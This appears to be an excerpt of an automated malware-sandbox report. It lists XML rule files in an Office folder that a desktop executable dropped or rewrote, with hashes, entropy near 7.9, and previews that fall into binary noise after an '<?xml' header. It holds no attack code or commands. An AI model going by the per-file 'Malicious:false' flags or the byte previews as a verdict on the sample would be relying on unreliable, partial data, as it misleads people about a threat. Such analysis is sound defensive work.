                                                                                                                                      Preview:<?xml.Y........p..mL.)..a.....*a.+ ..U.R5u...*....'.U4...gq..!.Z|......B..dG,..\...&4..pr.......?.5./nu....d.....7&.../....>...~N.%...z..^M....8@a.l.G...}>{...'W3,if.."r.......w.Z$..N...o....Pw..g....2....p.[...EM...<".r.c.~..A3.mDh.XQ.'....w.U....%.'o.>...H..PU.A{.)..L.W...A...L.Z..WZ<A+.#.4|@...q.,P.FA...f.mU.;..d.9...r...{..2..w...3.......9R.d.x........G..q.v1..F..BM.s..S.Kf...D~.oW#`...2...n.7.. .y..%..BT.4..l.c. ..?...W.....>.|.N.V.R.~J....w.....1I..-..\Kn.G..:...fq..>'-.7J...X......vT]..,...Va....IG......~F......5o..hxg.t...W29].....`...=......%....'...uUN....cf.6Jj...g..7V`D8.C.P.r.@.m.D....wo....a2(4=.+....C./L...3.......Vu(..f..l.....n9..g7<I"....'...!::.(.]7......q.$V.u)-....].`#....OT.2.En.q.iy.."...(7..mz.u.-=.....0V.-.|....<i.r}'*.......m.x..D.%.lA<.....`..U...`.%.....8...R..A)...?v.(....~..a..b.Y-...k...........&p.ev.Z.@A...x.1.O( ..V..=..9!......N...cn..1.y...)..Z..S..PJ..l.RC.......:y.xn.A......L.e<.T.Z.....w..h..p1.-..b..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.879963167175347
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:oWwThNvDFWft5g614VLaOJYrv/IR2fhjFrer3SJaD:NwTX5a58Pqr/o2Jx5Jy
                                                                                                                                      MD5:52B04C667BE6B857D1E19B0D15B40B66
                                                                                                                                      SHA1:34AD9E712E6D3C2034C3B27FA579412D627B3AC7
                                                                                                                                      SHA-256:8D0A50951F8F5FD6F9690A81125B124CFCF8A4E38B38F9E5E5A60E06104FAFA0
                                                                                                                                      SHA-512:813CD228ABD4964C91B40DB3CB4D00419246810236CAD73224C8556A54F64F78E9A76422ACB5326575F88CABA13B954983BFE04689D7843A68D923AC24BF943E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.*..|...1.K..{.`......k.{x.}GJ.I#....Pq....#..w..>ok..Y...<Qh&&.X.3.....t3..e+.?....P..'<e.q6...5. mUz.C.T..u..,.r.....+{.A...v..U...]..'P.M.mf.....C.8.z.z.cc.y..W.p.h].......W..6.+&w.Dn..,?..h..a..w.2..r..!.CQ ...........Z$..'..$..1..w.....[....5.Xuf.G...|.c.*b.|.......6..e.`.tr...y..3...c,.....-.....w.:$.8..Mm......4..k.>YJ..n.....E....u!....lp.S...c..K...Ug)...L<yH[.2u8X..V.7q...`X.n.....b..j...8..I.q?..<........c$C...9....%U.R.'......}........5....(?....yj-....L...<&.h.p...#.]..x._..R..G.YV.J..v"e._....L.J.-2.U...T.<....m`........-.c.a/....{.3i..YI...........%....~q/.Ye..n.....Gg+Dk..y..Fa..uF...J.3....Ve...tr<A..ZN....=..M....Ip....5..rG....P......'.R..!..u......j.B...l2F*8.Ve.....Ozu...g(....C.pp..E..."..~fP. ...`q...H.z....G..zRp..]_~.4>...t...5..o.+%..|<..V.F.(...."r....X..j:........db..5-.....A2-_..H...[RL....h.o.........I<.!......J.'`g@k@br.c.K..O.../[h.y....n....n.#....?...&....Z0Th.-.r..w..b.e....3_........1

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703700v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1711
                                                                                                                                      Entropy (8bit):7.883843976425042
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:o7kMsdaiD+t/yMWsqtOVMern8yGbWjODKsWRR4chbv/MVCTfiaONFBbD:h/av8A0WCDwhbvwCWaONPD
                                                                                                                                      MD5:2855B12E7765221BF968429C1EAB0780
                                                                                                                                      SHA1:C7DB06E5206D71BD55DB556B4AD6F2C86F050B86
                                                                                                                                      SHA-256:F6567DC3819217EB8184F2E4272BF122A2390989C4F9030CB8A86BA06814013D
                                                                                                                                      SHA-512:7EBC002242EA87A6607C52D2B8C6A07B30FA1E23073B91234B2B1316339EB4E6A166D8E553A954EBC4207935D6F4E84E273E867D75D0DD4F271A0F04639B8B28
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmly-)....C.#-7.R..@o..v.x.c./.z.-....7. ..l..$.n..x.Xl9..I......H.2Az/....je.@...F*iS.5.-:.@jS.O..rM>.........>.@.Z.p o..'...q.......D..'.ge`...,.=.r...q...=.....7M..t.j74.....N..2i.@,.v..O......)M....L._.w..h..8!T...ps. .j%..I....'...7.yT.9....@..-...o......... .z..S...r..s.....*R...>..G%......Q....K..H.sd.....M...T\..d..=.h>....#.h........U.X..(.....~q.z...5....\.R+...Lo5["(.6...9.;UV.G..u.4.#.[.!...a..{3.$M......L.#....tD.F". V7..19.2L...~^...K......+..bo....7.......%..h.....t.JCH..'.f...].......&....'....4.8..q....a.f~u]ziXO$...R....=.{..(........R.N.z..k.,...h...u`f.........8v....,J...VP.6$N...oK)h..m...qR.m...!...=...h;.H.Z.AB.Vi@E... .&.z.......?...Pe.....I~..Y.....d@..d ...T.So.x...c4...\.L..z.2..9.h...0..;.d...3P.6u/.^/.S...zQE6.,....9...c.VT.WS.q.....'.nq.2.s.aG.a.J-y.}6/..._}.......%P._.v.Z.W.{.P9.....$...;.F.l2-....?.i.V..&4*.D........VV.l...k.?c..1..m.....{....O.F...na.......kkD.......g.....r.....f..`.........d....%W.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703701v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1748
                                                                                                                                      Entropy (8bit):7.85467305454555
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:GS+tN3Qv19TfxugiATq/Ratxzc6LXbr8dKhpD:5qQv19TxyRatxzc6LXbr8dI
                                                                                                                                      MD5:337D8BEE18EEBCE20F61F5768C292567
                                                                                                                                      SHA1:BDA59A3255D4D682A2D7F3F702DDFBBF1BD01E19
                                                                                                                                      SHA-256:53A838C6CA329A6482849E62759F77C95E605FF962E8DF87F2561DE2FF5C48E4
                                                                                                                                      SHA-512:4C60D61F8668359D23939C7565CB95FC7BBECB31B6E12C9E21DFF64A4AF21136BDB38B127B0A47B3A922D350AE83F32B2DA0AA96DD0F9CC7FDBB6CCB695C5FB0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..K....vjC...?d+..5.....sG.s.H.=....ym.0|...3.....)N..)..9..n....w*....=G/vj..Z=B....S......l..)..P$WY....i."..ku.F.n0._|.'...x.[..-.(.u.;...M.yl6.X5.6....p.........'+..k..L..<.j../.{a..DP......1M.....9..&..&..ep....$.A..!........)ko4L..89.[..4.Ap...u7...}..Js.!V8..g\ .`.....'..3D...Q...U.0.*C.alO..Dw}'.B.'..@?8..Y.\.................#../.)..u.....3.~.V......|@..H<.*....`.<...3p8b.k...W.h!)I...C..8..h..<b;.y.<....I,e1.K..o...Jq..q.".W..m.'..3..;6...9Z.S.(.eo..IZh?...6....@].-...u\uN1....58.:.....n4....@V.Dg.!..'...WX.s...|(;...f0...._.{..?.....58..N....G5....j. ..e.Q*#...K..Hq../.3......}...,..RqU.....=...'...0.y.......L.f7e.......KN]/.G.].g..=.@...0.H...]h_.{&.J}....9...1ge.9.......,.1y.}.+....\.5Ip.s+...@.Y.3.[+.^....3..&!....@..r....".1|g..../......_...._I.....G..S4-..g..'.a......9.q.>*:.gV..VE."r..f.l..'(T}.k.....,.fuo..3<._.....>../~...Ug.;0..&Y*5..\..C..-...).2........~.....s.s../1.P......J...bup.^dh^.+.ssY#;...*\..m.V.....8@"4(..4.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703750v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1733
                                                                                                                                      Entropy (8bit):7.894139270749695
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8lF7PluLyKlJokdj16Kou1yV3F47RqgrWKD:c8Ldo01h4F473P
                                                                                                                                      MD5:35F104FE34C3624C90597FF8062760C0
                                                                                                                                      SHA1:C2446F41B0CB400977BB17B4C28DFDED099EC39D
                                                                                                                                      SHA-256:BCEBE1859C0BF4D2B053209AF268048CD6D16872D98859A659495FA5DEB6961B
                                                                                                                                      SHA-512:20A909371A89D3CD4ACF8C6BABA3F59776CEDD2F4ECB9BAD17A7BF1C4AF22393EAA6A9ADC8B1EB5BC928B2E8B88DEEC69F607BA473CDE0DD6512EE8483726BCF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlK#.QH....A..`.)='.bGc7.)......j...r.o......p.B.K......:.T...0&.....}.PW..B.....L...D.."...XA...yl.Tz C}ve`...F*.D....4.hW.@...0.zx<K.;SR..v..y.....4E.g..f...0<i.....x..w.t.!.%...e.x....?...KA.K.j..o..l.qC.d.g..vj~..uA...Q..dG.`.ZR..Q...W.m..K6.m.K&.^).5...>...2.,..Tr+@M.Y..h..\q.}+..Z...QG?e....cCEUI%S.M.....H....&.....w>....,s5...5r....&.....!h...3_....}..ll.Za@.*.}.T..<....$:.HO....g.\.).G:UU.X..6.....N.#i.....@w..O;...&N..a5...9!.j4...8.q2,.....~.ki]......\H.,.....i:l.....41...."..!.-(.......|...GV.xe..I......g..k..t.v.3M.f.h..........kC..*.r..D.?.6..B...H....&.w....5d.....|h{..... ...A9.).g....S..U....t...V.\Ql....+......IW....S...._.u..2.........r.uL.....`.>FOj....l..3.8..-T.....J[....u..[..O P..W}l..(*..r....L.T..Y.4...j....{Y....!}vl ..{........-..m:..M..,...#8...H..............0)A...d"$..!Y.Q.u.e:.....mg.....d(N'Z.~...Kq.|7.M...7G..*.K.lBY .Z..BA....@gF.t....P=.=...R.......o.k5.k.VQ.......`r.m..Y..a.z)..'{.5y0.^".....w&..@....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703751v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1770
                                                                                                                                      Entropy (8bit):7.8791361057533695
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:HSLwA17QUjwoRU7jkvmzwYOUT5QG54eldRqHdD:8w7VoRSLcx+5Qu4esHl
                                                                                                                                      MD5:EBB0DE98473B5EADAD0157EFC291C6F9
                                                                                                                                      SHA1:58D9B466EAE17A36BE1289A0D029EC49A3429B86
                                                                                                                                      SHA-256:B7B2DBA11C3037B251EA0AF4283F57BE3BA148385BCD43D70683529EF83513D3
                                                                                                                                      SHA-512:3139E26F794F9B5CB64F1D8642C1447669A4121F89EDB68E249D0837FCE0A1863F3CC69AA96953F0532ECDA0DDE8904816B1D9139FAB146BE5020C8141394C57
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.',..][.:.T......z]..%|..-..sW;.S....E..........Wyg._...........^|B..da...u...n.....?...'4V.Z....NS..D......8.R;....]mMr.a<..7......j.#Q.N.&.Qw8zc..g8.Q.~{."f......\6"w...~...3.]..e3 3....K:..'L..*F.m'.n....~.a...iE.`.7!.6&...".J....x5..plv2y.....}0@p.V.r...._uf&....`....'/..i.H1.q...l..3j.A.Z#....}....QY.c..../...g.m......(.^..b.."6V.9Y_.o..M.L..!...f.. .1<.&Vu...cD.-.L.f..T].Q..rS.3)..E..;....._Nz...'..*.B1X...pI..].#wk..|...J(D..b.....k....=a..O`._..J}...y-.ui.!...9.S.#.HH..r.Pd. ....D}..-c..y.oK...T....Lo.R..q\.J%B...B.0.2S...).4.B........c.....6.xu...c]=}..V....#...).KB...,=.d...\...Wp>... ....?..2.B....].....g...>....#&...1..>.O.s(....s..T.n...`#...K%.$.y..2".:JDtE.B.lL.R.1[...\1.....u.A..Z.E6..u........:vj.8...[..L.D..7..b.7....da...@\]Sp..[..'y.A.C....B.@}..y..m,._.....b..V.o8S.g......?....G..8....._...H,...|` w.K...3.+Y..W_do.8.p*h.Sr...2p.%.c.6.1......d....S.}ip..F...{...D...i.....=...2$J^$v...&....cD...!.......3k....>zs....',..V....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1715
                                                                                                                                      Entropy (8bit):7.873146214335691
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:eeBzzT2tsiLdZXWM38st/mq/PBlfJsid+mnxY19u0ZnNVkCi/8bNdmnWolyhkbD:eeE1bXH31t/maBXsid+QIZnnbuyhuD
                                                                                                                                      MD5:40C09E47DFC3E83DA29528F127F604E8
                                                                                                                                      SHA1:5763CE571C9498CCF601B317C5B7209ED7E21C4F
                                                                                                                                      SHA-256:AD118298BB5747C692ABF6850C5E71C11B1D780F89716499BD3A971126CBA939
                                                                                                                                      SHA-512:188E492F440D108096A1699F26F36CDA7B407629A45FB7E5CD341981566AC8BC63E52D3319CC3A49541ECC0772067D929F382CEE2AC975B9B4DF094114B23F5F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.d.D...<f...!5.yb..z..m....}....Q.1....OrR........o....v3*......a!?6V......k.N4..i....J.e.g....n..37:.k.3.....l...Q2_}.%X._#SU..YM.I.wl..|..4,-.#l.-.tv...xR.e.Gz$...:.+.8.wP.s...c.........Y...r^.....?..i....nD...Cki*...;...Y.$WU... ....&^4..e.....1.....R....B....b...$}..!.....v......#..i.?.4...1.......J...8....n.P.+l.....<..L.N2,_#?>Z.........x....m*..........^&.Ew"...%'.> ...b.......A..6..v...@|9)9\.f..<"...1....l'..76J.eT...T{O.......n.|....!d..8.q..jrD....V...8.'2j.{2.K...{.:...E..J~..p..j..Y..x.7..%-u9-.l.rQ.5C......o.`l.n1k...S..o.>EP..Z..h...C.t...e:(..z)...6v..=U.4......p..Q.d..%..D.......j.1=.. v.!u.Y..H..1.j^.]..r_.(..@...L:.."r....."oq.,9.q.-...+\Ub...5jg.*"..;..`.3Y..=W$...R.6....Z^6..(v6O~.![.o4...A.o..T...9.,.k..Q.....k8&...`j..o..C(.....Bhp..L......9?.:...n.3F`...>....vj..3.S..O....X.....w.)q.L.G:et....n.......+.`..;...#O..Yr..SL...B .>.......g.$,.g.k...tF.~r.......T]........C....En3g.Bl.2..f....].4~...S.|.P.`...F

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1752
                                                                                                                                      Entropy (8bit):7.896330635911335
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Q7A+R0Pok8XtpI1MNX1yKKrExlLVvuhgHP3HTjEIoq7D:QU+R0t8dptqKMkFIhmP3X8q3
                                                                                                                                      MD5:82C336B5903BFC37CE6E17F5E2D3FDFB
                                                                                                                                      SHA1:9A77DE4B8B8400E5B330B9BE4305530C8A0DDF4D
                                                                                                                                      SHA-256:306B31FDDC8A246BCE3F253D5D6FC84291FCF6B5B6C27BBDE1100FB66EB0A848
                                                                                                                                      SHA-512:451738AFBEC8F16F28D26890C5A18AE8E787A059B87C3F0DDBFC76B1B639FB97C2CB648E797C390ADFC49FE5F36A9790692A257EAB8840F03B7C5F4458A84659
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlm.+...w}X..?y...t..I....J..~...C+..g.d\.]L!U.7.\h.....5..5.:WCR.F....N<F...g3].M.q....R.....z.......t$H....)...+....Z\H@a...X.a..w......S.wF..2...Io......w...M.9_...D....9..b66...l..M./JB...Y...;M...!..z...-n..E.u..R\.W...%...?<......./.\......}.9....=..Bn.BE.d[#..r.f.K...7.. .....X.........e..[.........Hp..;.:b7......._.\E.^G.,.%MCd..'yr.H.L.......ha....t....,..j...<^.g[..J.8.g.J....../...U._.D.8.2..<....G.M^..`...&..+J.........?,.....)..1.`.<e.Dt..Ze.8.if...Sl.6..~.b1...]P].2..Z...Y......!...o/O......k..r4..V[.{...y_..E>.yI.{..Y....Nc.H=.ge.i.%...0.u...X...3...E....-.U.].F>5...C.M..z...J....j.y.(Z......a.Y.8.....r2|..\K.....K..T..6.{....#.c.C=.. ;....S..!+.AB....@q.~/.y.C.....e!......#.[.9Uub.#QA.......Z-7..F....H.p..0...S..|..>....W..3UEc.......u.....^G.B........3l.6....j..\*6...IZ.}:...........:.....&...O...ft...&.....oFIe7 ..V+I1....:3f3.m..0..V.V...7p|...~W.|....PlHI....RuaF.......[y.Jk.'..7....u?.V.hh.t>.%...<....J.O..L..m

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1738
                                                                                                                                      Entropy (8bit):7.886254997154665
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:9PVHT+sxAODLc3Ctw6iZ0r22xCVOuAb86olwirZgBD:tVz/xAfSypbVOX86BuZ0
                                                                                                                                      MD5:A13619E1AE7924438A860A626A671708
                                                                                                                                      SHA1:C6C45DFDCB052C5721C67CA43577AE37C8AF4240
                                                                                                                                      SHA-256:4F97A331BA1B68627D7FDCADBB0AC25A0BFAB9809BAE820302815AE2497EF1A7
                                                                                                                                      SHA-512:69D26AFCA40739A00686F71526C9B11451CEABA32E18057438F2367330F4D86DD70D2D317B1DAB9AB63D8DEFE5C931187A365F8B5E35789F32972E7C3523BA99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml/rb.D...w...g..,...NQ(kI..6.M.s..>:.{m.I.:...$.i"..u.........jQ..F............<...2...E.....S...'.3..k....l..~..}.m..4qH...KS.V^..5.S..4h....&.e.C~|.....P...i.JW.....q...TQ.*.G|P.;*....ct]...... z.9..1..gl.?.7..=5..*."....G...7,.!/6.p.9.'.u..[r4.D._%.pQZ........0P..em.1#...Y..Pe.k..3.....5Ld.s+O.n'.h.k{R....e..?hK_.]6..*.6..44.%.j;./?....B|..(I3.....o> ..K...r.x...).K.g.Q75..nf..2.6...J..S..d.+..CP.*{tWmf`Y.....h.q..p........Y..Ni]YU...6.......hU..LO....S0d..0../..~.........!!..y..~...!vj......#..l..).z..N0.t.U.._d6.&=..3...M0.....;`a...ue..r.=...O....:..Q.^Dt....B.I....`.i...'.~..8.h.{..I.......!..~J$.:38........,IB..l[..<s..................t.....0.cK....q\|..._.2O&...P...>.<(..U..r.alc.o;...!...?..."u.Q1.U.M'.>.....4.u...H......'........v0.<...rw..4.U....g......b..'....,..10...bvT..~_......!.UU..6..HpS..?.u../.....:.l.R9.*.u...lZ.-.@-6f.e>.......?..OcM. .4UX..@].^.....2.(.At...2D....I........N...3z.u..../....C.d..)......(..O...ou....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1775
                                                                                                                                      Entropy (8bit):7.885409990512918
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wHomFUyDwovDAWlPCXq+/3orxj4ZwlJMUmvlrs6FoyQ0g03irjQf7m0052K+VZbD:wDEovNmqEaRCwsNrsmLgnrEd052K+7D
                                                                                                                                      MD5:C657FE66179A2AE7BCEDC3A708B2FEC9
                                                                                                                                      SHA1:6D52DD1F71F1DA7BD6FAB035CC0FB35915AA6D69
                                                                                                                                      SHA-256:172696F693C759ED5F8A7DA68DDFBE43ED0FFA1CC09EBA6228C1032A4581E4FC
                                                                                                                                      SHA-512:228DCB5312368C2E918AB7EE2A0F8DE2ECA1F57071E5B15F41BD793A4D65A9A15719E43CA05C8BAFEB026A167A2E7CA00E12EC880E20D663327ABBE4E464601F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml[IcQ...3........9..).s..e2..Q$$....J.|[.vO-dX.^.^....x.>.(1..k....oE.....rC..d..;.Z..../....~..<".{..9aO.R2.....d.GY..........Uo.EQ../ .:B...\DPL....[i.....=.2...F......O..`. Tg....(...f..LH.pl..-.%*.YU....v.....)P.2[G..qF....\.1.....f{.K.y..!..z'`,?#m...;.=...'K.ML\..3h........L_....X....8....`6.. 4+..9H.^.iY....5.v..MG.\...m..]...M.Z.Q.D..3.T.>uJ.I|.6<i.Q.J.).>`N......."?..Rrm..$........L.Y..>tV...=D.5}eo../.[.~Rj..qe.....S..p...L.a.(.+.n...(.`.?.]..g_>X.M.&..,'\m0...i..+.O.-..u.0...o+7./6kF. ....TP..e.6....C.d...B...g..o'>....._.EF....k(..#U.$..A.xmF:..(.9h....G.\....W...0..?.?.0...+...6V.........K~oH..L.Bj......I.:....t..l.b..V2W.5;.Y.gG...)S9.i.$>...|].N..M/...)...u....c..Ee..N...S.%e../.P...ffP.........73.y.......4yX....DC..7..U.v,R....E..2.6.. .....l.2.....vd...c.._..lP....,...p..Q..y...b1..HF.....2.Q.;..m.=......}.s....;".W....q}.7..$..s.O.....2..Z)..e.j!ZV.I....e.....|...i$.'|.p.@.._.<......M8...z...Q[...M ...C.|........u.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1723
                                                                                                                                      Entropy (8bit):7.893688391349218
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Lue39Md1liTxSgixR3G/NegoxxuR/yPu01QihqD:Lus9Md1liExxR3oh6Hl0
                                                                                                                                      MD5:E62B0F4DE3E96423D4F614335938598F
                                                                                                                                      SHA1:5E1653BB1DEAC273B0576F4526309F4B3585C71F
                                                                                                                                      SHA-256:69B6A899B880A5BC62D3B70C1AD7FB136FA4DAA155AC8C7FCF3F3B6604364A7D
                                                                                                                                      SHA-512:9D77D2D07317D8AB7B1B43BF5C168F122DC96ABB4AF4D87B8BA23C9CA8E3BDEE935E7F845EE39962594EB4915A66320347897B7F06FC98C1909975F38A0701EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..O.*4...4+.........[.bQ#G....Ph.v..n.....gaa2P...p6..........hVF.N.....E..Z.`...a.h..^...6.?..sM5..J.i..u...g..%.Y.}x...d..x..u9..<..Z.......Y.....}O...|n...E+f.-.b.de.....3...q.>...c...}]S.p..}~..i(U*...P..4.Rv>..`>;.m....>.q..*^..\.#Dw.b.h......w*..k...c...&....$.z_W.*..Y....3...k%..[x.3I..JHk5....S..*.wR.....0.L.'.KB...(.{...H@]s+g..{..i...[...*..c<..IV....O.....8.....]cm6ilX{..R..2{x.v.g..|....Y.`..+evq.....:.........`..Ta..n..j~V.U...Xj.].2b.b...Ky.Td.F.j...:m.../.+.1l..D.r.....U..S.....g..:..Y..X.7..$Q...s.....IR.B.:p5'z..E....]....t...W$.w.O..q.{".S..Q....K.....t5>...4D&U........7.DaAg..=.....n.{.x.:..)..:?..._.L..x........C*y.}.:uD/..6Q5`..m...v..i+".".om.~...).K..Y...y.A."..8.._T.&.a..Vcw....~y.:.....RM..O.;..,..#..h...g ..l).tx..i.S..a.~.y.;=d....`vx|.:N&X2..4K.....<..y.9......e`..U.....#.ug/o.-....m..(..3B...4..x<...g.6E.^............k..%......n..;V#.....c......h...w.....h|..R.oY..........Z.....#.......pQ....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1760
                                                                                                                                      Entropy (8bit):7.899112143700606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1KTcYUby+JiA1IPoim1P6Uc7Fh0UoknKOD:ujaj0AtPOEOl
                                                                                                                                      MD5:2C127283B2C4EDA5888687ED181FE270
                                                                                                                                      SHA1:90EF6D1707963E2D19863DC8FE3079DC3FD046D2
                                                                                                                                      SHA-256:828A7DD896798C259CCC80B762827C36C01A7BCD6EC2C96DFF07974EA3488926
                                                                                                                                      SHA-512:EE5895CDDA8358F4B16BA50A83DB57E7BFE0F980E2BBC9B60E56CB57B4A9EF4C6F6E63449E5EA0B87BF12FBEA980C32AB1BB53435D7BDC2F544663378086D0D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..a..0..4`<H2.OO,.Z...&L2.......q>\.2....N..]...0d......,......;....1..&X..I....n<eW<l.f........B=S<#"j...%.....(..>.4...n..b.......7k...T0....NT. ...mo'}H......D...q.v.x..Y@..6C.2.......$.Zm..?....n+YN:.}4....s...`.&..6...9.`.G.l$:I'.*T..U!.A....U.h.{./G.Z.1.Mi;..gQx.nM^).R=.....}m....'..d..y....f......-..Ho=.K..:...`p..g.M......x.;...._.Y.WT...`.jX..(\bz.N.Z....0..'9..e<Ao ...l.T$.8.......R4.o(.0I.p.U...u...}*.....~....N....y..+..7!...j...u..{We..i].y...F>......>.A...9.g.ED....B".....U.R.5......8.t..(I..E....].0.EL.....w...t?}.Yax...=...\2w.VA.m.5..h!..-V....,._w..]A...$.%..F..j.j...R.V.|............H .C4y...Sx..u..v....MJ....*...>.3W..L..5...gd;.i}...Nx.......t.Y>!\..{.v.._!...%...o...og......4..^.7.Q.".....@....e.....F.a...._..y.a..g..,.]X[..A....Z..M..B...O3.ZJ..V...P...@Tm......[...%.........sd.-.a....q...p.zi..'.=I..KK.2C.R.Fs..(..}..`..#........M."...7....D.#..n.hO.sV...9....W....tey......s%.E.tL SZM&R.#........!.M......^D..R...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1699
                                                                                                                                      Entropy (8bit):7.888340701911469
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:nnTSKCpfHX91DpW6gCZYrpL4ucB4+ldzUHCPNBQD:nCpHFOQYrpMxBJIiPLM
                                                                                                                                      MD5:AA4FFB536AAA4DE95F549E6757528DA9
                                                                                                                                      SHA1:AD5C5415E96980F146FDE9B9FE62A1E0503851AB
                                                                                                                                      SHA-256:0881499DBF7F657F653B71B76ACC29A76A2CAC36902D6D3BA66780F92B08A77D
                                                                                                                                      SHA-512:142CA8BD049A70767899FF012205EA4533382CF82428800EA84CB35D3534DB42D66F3E1DC120A553A0C42A20FDC3BFE9A4930B5BF55155F24215B94C46FD6155
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....O.3..jmr./f.+.....x.*&....E4...j.`.0....D.L.....R8.Kg.......!p...B.4..dV|g.a.......yre...x.k....Vs..2......%.UE....6...|5N.kZ..1.8`]......=.].....n.\0M..4s@..Y.YJ.e...:.92..l.;\......e.Pz.....%...(F>.fK.%#I..:.....JO{p...<'....H].h.Lb\.l.c?....gH~.^p.......J.z8..;.P...9.j..-BX...O.4.z......9W.JHk.6DG.v.....w.........F....X.L~...{k.7o-.O...j..!U.8..ao...3..c.~.T.....F..y..M..T3..OZ.A.O.,R..!.I.n..I.)..;<8..:C.k/ WO.y@.Gn.z.3.(.^.M.V(...M....c.[Y..U$k....F)>.......@..vF....{..W'OI.{et...m.%!.......:..9.{....R...K..m.R.'...K._....z.r.L....k..h9W...2C....R.$..K.]...a.M..y.:...S6.2.x...8.L:...a....2....b.w.....P.r9.&...H...zs...~.E..o9.h.v@..-...R.h>.............{J.6..@kg..T.4)8_w@..\1-..).;...g.....)..Q......j,.#a.h.+$/#E..P....f@..'..J.._.ks~/..Wk.$|je....c.....X...O.\...Kf..|..'=/0......T.K.Ic.....<r...........B......mC..J.....c.r.o1?`.N%.._$2@'=.#..S.{!L...%...T>[0ck.v... &@...XU.]e..q.{H.TJ.%..gj.............AL.....DN.Y.\$..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml

                                                                                                                                      Download File
